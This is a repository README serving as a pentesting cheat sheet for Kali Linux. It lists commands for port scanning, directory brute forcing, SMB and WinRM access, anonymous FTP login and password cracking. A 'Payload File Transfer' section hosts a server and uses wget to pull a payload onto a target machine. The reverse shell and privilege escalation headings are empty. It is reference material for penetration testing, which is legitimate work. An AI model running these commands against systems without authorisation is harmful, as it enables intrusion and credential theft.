kqjy/Offensive-Security-Cheat-Sheet
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
42bb70be5bd3fa299a00718b281f5bba207323bc
Offensive-Security-Cheat-Sheet/README.md
Joe Totes 42bb70be5b Update README.md
2022-07-30 15:10:31 -04:00

4.1 KiB
Raw Blame History

Offensive Security Tools


Here you will find a useful collection of commands and file resource locations used in Pentesting operations. This reference is will go hand in hand with Kali Linux.




General Enumeration

NMAP


OVERVIEW
Description A network scanning tool that identifies devices, ports, services, and operating systems
Download Pre-installed on Kali Linux

USAGE


nmap -p- --min-rate 5000 -sC -sV {IP ADDRESS}


NMAP Automator


OVERVIEW
Description Useful script that automates multiple enumeration scans in succession
Download nmapAutomator.sh

USAGE


./nmapAutomator.sh --host {IP ADDRESS} --type All

Port Enumeration


FTP [21]


ftp


OVERVIEW
Description Connect to FTP server
Download Pre-installed on Kali Linux

USAGE


ftp {IP ADDRESS}

# Default Credentials
anonymous

# Directory Command   
dir
# Download Command    
get
# Upload Command      
put


## SSH [22]
## DNS [53]
## FINGER [79]
## Web Server [80, 443]

gobuster


OVERVIEW
Description Brute Forcing Web Directories
Notes Not recursive, only digs one level deep
Download Pre-installed on Kali Linux

USAGE


gobuster dir -u {IP ADDRESS} -w /usr/share/wordlists/dirb/common.txt

ALTERNATIVE WORD LISTS


┌──(kali㉿kali)-[/usr/share/wordlists/dirb]

big.txt  
catala.txt  
common.txt  
euskera.txt  
extensions_common.txt  
indexes.txt  
mutations_common.txt  
others  
small.txt  
spanish.txt  
stress  
vulns

┌──(kali㉿kali)-[/usr/share/wordlists/dirbuster]

apache-user-enum-1.0.txt      
apache-user-enum-2.0.txt
directories.jbrofuzz   
directory-list-1.0.txt  
directory-list-2.3-small.txt   
directory-list-lowercase-2.3-small.txt
directory-list-2.3-medium.txt 
directory-list-lowercase-2.3-medium.txt

Kerberos [88]


POP3 [110]


SNMP [161]


LDAP [389]


SMB [445]

smbclient


OVERVIEW
Description Connect to SMB
Download Pre-installed on Kali Linux

USAGE


# List all SMB Shares
smbclient -L {TARGET_IP}

# Authenticate with local credentials
smbclient -N \\\\{TARGET_IP}\\{SHARE} 

# Authenticate with Administrator 
smbclient -N \\\\{TARGET_IP}\\{SHARE} -u Administrator


MSSQL [1433]


NFS [2049]


RDP [3389]


WINRM [5985, 5986]


OVERVIEW
Description A tool used to hack WINRM from a linux console
Download Pre-installed on Kali Linux

USAGE


evil-winrm -i {IP ADDRESS} -u {USERNAME} -p {PASSWORD}

Password Cracking

John The Ripper


OVERVIEW
Description Password/hash cracking tool
Download Pre-installed on Kali Linux

USAGE


john -w=/usr/share/wordlists/rockyou.txt {file.txt}

Payload File Transfer

1) Python Server


USAGE


# Host a personal server on client machine
sudo python3 -m http.server {PORT}

# {PORT}: Port to open for transfer

2) WGET


USAGE


# Download files on the remote machine
wget http://{IP ADDRESS}/{FILE} -outfile {FILE}

# {IP ADDRESS}: Python Server IP Address
# {FILE}: The payload to be trasnfered

Privilege Escalation

Linux

Windows

Reverse Shell

Linux

Windows

Reference in New Issue View Git Blame Copy Permalink